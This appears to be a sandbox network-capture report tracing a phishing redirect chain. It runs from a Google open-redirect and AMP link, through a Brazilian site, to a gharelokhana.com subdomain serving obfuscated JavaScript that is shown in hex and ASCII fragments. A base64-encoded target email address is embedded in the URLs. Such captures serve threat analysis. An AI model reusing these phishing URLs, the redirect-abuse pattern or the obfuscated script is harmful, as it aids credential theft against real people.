Dec 4, 2024 17:37:41.404963017 CET	54734	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:41.637116909 CET	53	49215	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:41.648269892 CET	53	54734	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:43.892205000 CET	58380	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:43.894584894 CET	61962	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:44.076942921 CET	53	61962	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:44.080034018 CET	53	58380	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:45.437556982 CET	53	61619	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:59.104979038 CET	53	56930	1.1.1.1	192.168.2.16
Dec 4, 2024 17:38:17.441168070 CET	53	52500	1.1.1.1	192.168.2.16
Dec 4, 2024 17:38:24.815083981 CET	53	63409	1.1.1.1	192.168.2.16

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 4, 2024 17:37:21.257872105 CET	192.168.2.16	1.1.1.1	c22b	(Port unreachable)	Destination Unreachable
Dec 4, 2024 17:37:28.511123896 CET	192.168.2.16	1.1.1.1	c24c	(Port unreachable)	Destination Unreachable
Dec 4, 2024 17:37:29.214566946 CET	192.168.2.16	1.1.1.1	c207	(Port unreachable)	Destination Unreachable
Dec 4, 2024 17:37:34.004789114 CET	192.168.2.16	1.1.1.1	c241	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:20 UTC	1010	OUT	GET /url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1 Host: google.dz Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 16:37:20 UTC	847	IN	HTTP/1.1 301 Moved Permanently Location: https://www.google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Falvoradavisual.com.br%2Fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-rN9eJ5DNn6rHyBL8HniS6w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Permissions-Policy: unload=() Date: Wed, 04 Dec 2024 16:37:20 GMT Expires: Fri, 03 Jan 2025 16:37:20 GMT Cache-Control: public, max-age=2592000 Server: gws Content-Length: 432 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-04 16:37:20 UTC	432	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 64 7a 2f 75 72 6c 3f 71 3d 71 6d 72 62 64 4a 4c 69 36 7a 33 79 68 26 61 6d 70 3b 72 63 74 3d 74 54 50 76 76 71 36 78 52 79 6a 37 59 30 30 78 44 6a 6e 6c 78 39 6b 49 6a 75 73 75 63 54 26 61 6d 70 3b 73 61 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.dz/url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:22 UTC	1014	OUT	GET /url?q=qmrbdJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Falvoradavisual.com.br%2Fyoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1 Host: www.google.dz Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 16:37:23 UTC	1113	IN	HTTP/1.1 302 Found Location: https://www.google.dz/amp/s/alvoradavisual.com.br/yoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A Cache-Control: private Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-osEuXVdOVXdI5dc3ESJ0LQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Wed, 04 Dec 2024 16:37:23 GMT Server: gws Content-Length: 352 X-XSS-Protection: 0 Set-Cookie: NID=519=DGMtKYb24xzsu15PBn55R-BKf7id3VCngc-KUkDaHp21XTwfjLUVFRVNf_1igPlCO1nbw2rUtQxN6aLGucYWqWRcukRRTEXlC0ANWPhF5hAAHTBXhxWDBRwLTG34UIyvMECi3Q4FbciuWLNU-ZbPMDhvMwFGoHM9um_kUw6V55BHedkLPbGIQF0WJ-exJrpweHOf; expires=Thu, 05-Jun-2025 16:37:23 GMT; path=/; domain=.google.dz; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-04 16:37:23 UTC	277	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 64 7a 2f 61 6d 70 2f 73 2f 61 6c 76 6f 72 61 64 61 76 69 73 75 61 6c 2e 63 6f 6d 2e 62 72 2f 79 6f 79 61 2f 66 71 66 37 2f 61 6e 56 6c 63 6d 64 6c 62 69 35 7a 59 32 68 33 59 58 4a 36 51 47 4e 68 63 47 56 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.dz/amp/s/alvoradavisual.com.br/yoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGV
2024-12-04 16:37:23 UTC	75	IN	Data Raw: 33 25 45 32 25 38 32 25 41 43 25 45 32 25 38 30 25 39 41 24 24 24 25 43 33 25 41 33 25 45 32 25 38 32 25 41 43 25 45 32 25 38 30 25 39 41 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: 3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A">here</A>.</BODY></HTML>

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:25 UTC	1160	OUT	GET /amp/s/alvoradavisual.com.br/yoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1 Host: www.google.dz Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=519=DGMtKYb24xzsu15PBn55R-BKf7id3VCngc-KUkDaHp21XTwfjLUVFRVNf_1igPlCO1nbw2rUtQxN6aLGucYWqWRcukRRTEXlC0ANWPhF5hAAHTBXhxWDBRwLTG34UIyvMECi3Q4FbciuWLNU-ZbPMDhvMwFGoHM9um_kUw6V55BHedkLPbGIQF0WJ-exJrpweHOf
2024-12-04 16:37:26 UTC	872	IN	HTTP/1.1 302 Found Location: https://alvoradavisual.com.br/yoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=$$$ Cache-Control: private X-Robots-Tag: noindex Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-gmA_kU17gI4CiNXWWmE-ww' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Permissions-Policy: unload=() Date: Wed, 04 Dec 2024 16:37:26 GMT Server: gws Content-Length: 300 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-04 16:37:26 UTC	300	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 76 6f 72 61 64 61 76 69 73 75 61 6c 2e 63 6f 6d 2e 62 72 2f 79 6f 79 61 2f 66 71 66 37 2f 61 6e 56 6c 63 6d 64 6c 62 69 35 7a 59 32 68 33 59 58 4a 36 51 47 4e 68 63 47 56 73 62 47 46 7a 63 47 46 6a 5a 53 35 6a 62 32 30 3d c3 a3 e2 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://alvoradavisual.com.br/yoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:32 UTC	769	OUT	GET /yoya/fqf7/anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1 Host: alvoradavisual.com.br Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 16:37:33 UTC	284	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 16:37:33 GMT Server: Apache refresh: 0;url=https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=$$$ Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-12-04 16:37:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:35 UTC	849	OUT	GET /?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1 Host: fdgfhvcfdgfhhjh.gharelokhana.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://alvoradavisual.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-04 16:37:36 UTC	181	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
2024-12-04 16:37:36 UTC	16200	IN	Data Raw: 33 66 34 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 6b 2c 63 29 7b 76 61 72 20 57 61 3d 61 30 6b 35 2c 4b 3d 6b 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 57 3d 70 61 72 73 65 49 6e 74 28 57 61 28 30 78 32 63 31 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 57 61 28 30 78 33 35 65 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 57 61 28 30 78 31 63 65 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 57 61 28 30 78 33 35 30 29 29 2f 30 78 34 2b 70 61 72 73 65 49 6e 74 28 57 61 28 30 78 35 39 Data Ascii: 3f40<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> (function(k,c){var Wa=a0k5,K=k();while(!![]){try{var W=parseInt(Wa(0x2c1))/0x1*(-parseInt(Wa(0x35e))/0x2)+parseInt(Wa(0x1ce))/0x3+-parseInt(Wa(0x350))/0x4+parseInt(Wa(0x59
2024-12-04 16:37:36 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 4b 73 5b 69 5a 28 30 78 32 64 66 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 4b 49 2c 4b 66 29 7b 76 61 72 20 69 79 3d 69 5a 3b 69 66 28 69 79 28 30 78 35 37 66 29 21 3d 3d 27 5a 79 65 4b 79 27 29 6b 68 3d 21 30 78 30 2c 4b 6f 28 6b 4e 29 3b 65 6c 73 65 7b 76 61 72 20 4b 48 2c 4b 75 2c 4b 4c 2c 4b 54 2c 4b 45 2c 4b 4e 3d 4b 49 5b 69 79 28 30 78 34 31 38 29 5d 2c 4b 61 3d 4b 49 5b 69 79 28 30 78 32 35 65 29 5d 2c 4b 4a 3d 4b 49 5b 69 79 28 30 78 31 63 63 29 5d 3b 69 66 28 4b 48 3d 4b 61 3f 4b 58 3a 4b 4a 3f 4b 58 5b 4b 4e 5d 7c 7c 4b 70 28 4b 4e 2c 7b 7d 29 3a 4b 58 5b 4b 4e 5d 26 26 4b 58 5b 4b 4e 5d 5b 69 79 28 30 78 34 65 37 29 5d 29 66 6f 72 28 4b 75 20 69 6e 20 4b 66 29 7b 69 66 28 4b 54 3d 4b 66 5b 4b 75 5d 2c 4b 4c 3d 4b 49 5b 27 64 6f 6e Data Ascii: 4000Ks[iZ(0x2df)]=function(KI,Kf){var iy=iZ;if(iy(0x57f)!=='ZyeKy')kh=!0x0,Ko(kN);else{var KH,Ku,KL,KT,KE,KN=KI[iy(0x418)],Ka=KI[iy(0x25e)],KJ=KI[iy(0x1cc)];if(KH=Ka?KX:KJ?KX[KN]\|\|Kp(KN,{}):KX[KN]&&KX[KN][iy(0x4e7)])for(Ku in Kf){if(KT=Kf[Ku],KL=KI['don
2024-12-04 16:37:36 UTC	8	IN	Data Raw: 37 35 29 5d 29 3b 0d 0a Data Ascii: 75)]);
2024-12-04 16:37:36 UTC	10724	IN	Data Raw: 32 39 64 63 0d 0a 7d 3b 7d 2c 30 78 61 39 3a 66 75 6e 63 74 69 6f 6e 28 4b 73 2c 4b 47 2c 4b 6c 29 7b 76 61 72 20 42 35 3d 61 30 6b 35 2c 4b 58 3d 4b 6c 28 30 78 31 32 39 61 29 2c 4b 62 3d 4b 6c 28 30 78 32 31 31 39 29 2c 4b 6f 3d 4b 6c 28 30 78 35 63 62 29 2c 4b 4f 3d 4b 6c 28 30 78 31 36 37 62 29 2c 4b 70 3d 4b 6c 28 30 78 31 37 65 29 2c 4b 65 3d 4b 6c 28 30 78 38 30 30 29 5b 42 35 28 30 78 32 64 39 29 5d 2c 4b 46 3d 4b 6c 28 30 78 31 63 36 34 29 2c 4b 49 3d 4b 6c 28 30 78 31 31 38 33 29 2c 4b 66 3d 4b 49 5b 42 35 28 30 78 32 39 62 29 5d 2c 4b 48 3d 4b 49 5b 42 35 28 30 78 32 31 30 29 5d 2c 4b 75 3d 53 74 72 69 6e 67 2c 4b 4c 3d 4f 62 6a 65 63 74 5b 42 35 28 30 78 34 37 37 29 5d 2c 4b 54 3d 4b 58 28 27 27 5b 42 35 28 30 78 33 30 36 29 5d 29 2c 4b 45 3d Data Ascii: 29dc};},0xa9:function(Ks,KG,Kl){var B5=a0k5,KX=Kl(0x129a),Kb=Kl(0x2119),Ko=Kl(0x5cb),KO=Kl(0x167b),Kp=Kl(0x17e),Ke=Kl(0x800)[B5(0x2d9)],KF=Kl(0x1c64),KI=Kl(0x1183),Kf=KI[B5(0x29b)],KH=KI[B5(0x210)],Ku=String,KL=Object[B5(0x477)],KT=KX(''[B5(0x306)]),KE=
2024-12-04 16:37:36 UTC	16384	IN	Data Raw: 33 66 66 39 0d 0a 6e 74 27 3a 4b 62 5b 42 4d 28 30 78 32 30 66 29 5d 28 2f 5c 24 2f 67 2c 27 27 5b 42 4d 28 30 78 35 62 35 29 5d 28 4b 4a 29 29 7d 3b 7d 7d 2c 30 78 62 31 30 3a 66 75 6e 63 74 69 6f 6e 28 4b 73 2c 4b 47 2c 4b 6c 29 7b 76 61 72 20 42 50 3d 61 30 6b 35 2c 4b 58 3d 4b 6c 28 30 78 31 35 63 61 29 3b 4b 73 5b 42 50 28 30 78 32 64 66 29 5d 3d 4b 58 5b 27 50 72 6f 6d 69 73 65 27 5d 3b 7d 2c 30 78 38 37 63 3a 66 75 6e 63 74 69 6f 6e 28 4b 73 2c 4b 47 2c 4b 6c 29 7b 76 61 72 20 42 59 3d 61 30 6b 35 2c 4b 58 3d 4b 6c 28 30 78 38 66 35 29 2c 4b 62 3d 4b 6c 28 30 78 36 61 38 29 2c 4b 6f 3d 4b 6c 28 30 78 34 39 35 29 3b 4b 73 5b 42 59 28 30 78 32 64 66 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 4b 4f 2c 4b 70 29 7b 76 61 72 20 42 53 3d 42 59 3b 69 66 28 4b 58 Data Ascii: 3ff9nt':Kb[BM(0x20f)](/\$/g,''[BM(0x5b5)](KJ))};}},0xb10:function(Ks,KG,Kl){var BP=a0k5,KX=Kl(0x15ca);Ks[BP(0x2df)]=KX['Promise'];},0x87c:function(Ks,KG,Kl){var BY=a0k5,KX=Kl(0x8f5),Kb=Kl(0x6a8),Ko=Kl(0x495);Ks[BY(0x2df)]=function(KO,Kp){var BS=BY;if(KX
2024-12-04 16:37:36 UTC	16384	IN	Data Raw: 0a 38 30 30 30 0d 0a 4b 6c 28 30 78 31 36 37 62 29 2c 4b 4f 3d 4b 6c 28 30 78 37 34 61 29 2c 4b 70 3d 4b 6c 28 30 78 31 37 38 64 29 2c 4b 65 3d 4b 6c 28 30 78 31 33 39 65 29 2c 4b 46 3d 4b 58 5b 76 69 28 30 78 33 35 31 29 5d 2c 4b 49 3d 4b 62 28 76 69 28 30 78 32 32 34 29 29 2c 4b 66 3d 4b 65 3f 4b 46 5b 76 69 28 30 78 32 38 39 29 5d 7c 7c 4b 46 3a 4b 46 26 26 4b 46 5b 76 69 28 30 78 34 37 36 29 5d 7c 7c 4b 4f 3b 4b 73 5b 27 65 78 70 6f 72 74 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 4b 48 29 7b 76 61 72 20 76 56 3d 76 69 3b 72 65 74 75 72 6e 20 4b 6f 28 4b 49 2c 4b 48 29 7c 7c 28 4b 49 5b 4b 48 5d 3d 4b 70 26 26 4b 6f 28 4b 46 2c 4b 48 29 3f 4b 46 5b 4b 48 5d 3a 4b 66 28 76 56 28 30 78 33 65 63 29 2b 4b 48 29 29 2c 4b 49 5b 4b 48 5d 3b 7d 3b 7d 2c 30 78 31 Data Ascii: 8000Kl(0x167b),KO=Kl(0x74a),Kp=Kl(0x178d),Ke=Kl(0x139e),KF=KX[vi(0x351)],KI=Kb(vi(0x224)),Kf=Ke?KF[vi(0x289)]\|\|KF:KF&&KF[vi(0x476)]\|\|KO;Ks['exports']=function(KH){var vV=vi;return Ko(KI,KH)\|\|(KI[KH]=Kp&&Ko(KF,KH)?KF[KH]:Kf(vV(0x3ec)+KH)),KI[KH];};},0x1
2024-12-04 16:37:36 UTC	16384	IN	Data Raw: 73 47 28 30 78 32 61 32 29 5d 2c 4b 75 3d 4b 70 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 6c 3d 73 47 2c 4b 4c 3d 4b 6f 28 4b 49 5b 73 6c 28 30 78 35 61 64 29 5d 29 3b 4b 65 28 4b 46 2c 66 75 6e 63 74 69 6f 6e 28 4b 54 29 7b 76 61 72 20 73 58 3d 73 6c 3b 4b 62 28 4b 4c 2c 4b 49 2c 4b 54 29 5b 73 58 28 30 78 33 31 62 29 5d 28 4b 66 5b 73 58 28 30 78 35 61 64 29 5d 2c 4b 48 29 3b 7d 29 3b 7d 29 3b 72 65 74 75 72 6e 20 4b 75 5b 27 65 72 72 6f 72 27 5d 26 26 4b 48 28 4b 75 5b 73 47 28 30 78 35 32 64 29 5d 29 2c 4b 66 5b 73 47 28 30 78 34 31 66 29 5d 3b 7d 7d 29 3b 7d 2c 30 78 32 34 30 66 3a 66 75 6e 63 74 69 6f 6e 28 4b 73 2c 4b 47 2c 4b 6c 29 7b 76 61 72 20 73 62 3d 61 30 6b 35 2c 4b 58 3d 4b 6c 28 30 78 32 31 61 34 29 2c 4b 62 3d 4b 6c 28 30 78 34 Data Ascii: sG(0x2a2)],Ku=Kp(function(){var sl=sG,KL=Ko(KI[sl(0x5ad)]);Ke(KF,function(KT){var sX=sl;Kb(KL,KI,KT)[sX(0x31b)](Kf[sX(0x5ad)],KH);});});return Ku['error']&&KH(Ku[sG(0x52d)]),Kf[sG(0x41f)];}});},0x240f:function(Ks,KG,Kl){var sb=a0k5,KX=Kl(0x21a4),Kb=Kl(0x4
2024-12-04 16:37:36 UTC	9	IN	Data Raw: 69 6f 6e 20 6b 57 28 0d 0a Data Ascii: ion kW(
2024-12-04 16:37:36 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 4b 73 29 7b 76 61 72 20 47 56 3d 47 57 3b 72 65 74 75 72 6e 21 21 4b 73 26 26 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 4b 73 5b 47 56 28 30 78 33 31 62 29 5d 3b 7d 66 75 6e 63 74 69 6f 6e 20 6b 69 28 4b 73 2c 4b 47 29 7b 74 72 79 7b 76 61 72 20 4b 6c 3d 4b 73 28 29 3b 6b 57 28 4b 6c 29 3f 4b 6c 5b 27 74 68 65 6e 27 5d 28 66 75 6e 63 74 69 6f 6e 28 4b 58 29 7b 72 65 74 75 72 6e 20 4b 47 28 21 30 78 30 2c 4b 58 29 3b 7d 2c 66 75 6e 63 74 69 6f 6e 28 4b 58 29 7b 72 65 74 75 72 6e 20 4b 47 28 21 30 78 31 2c 4b 58 29 3b 7d 29 3a 4b 47 28 21 30 78 30 2c 4b 6c 29 3b 7d 63 61 74 63 68 28 4b 58 29 7b 4b 47 28 21 30 78 31 2c 4b 58 29 3b 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 56 28 4b 73 2c 4b 47 2c 4b 6c 29 7b 72 65 74 75 72 6e 20 76 Data Ascii: 4000Ks){var GV=GW;return!!Ks&&'function'==typeof Ks[GV(0x31b)];}function ki(Ks,KG){try{var Kl=Ks();kW(Kl)?Kl['then'](function(KX){return KG(!0x0,KX);},function(KX){return KG(!0x1,KX);}):KG(!0x0,Kl);}catch(KX){KG(!0x1,KX);}}function kV(Ks,KG,Kl){return v
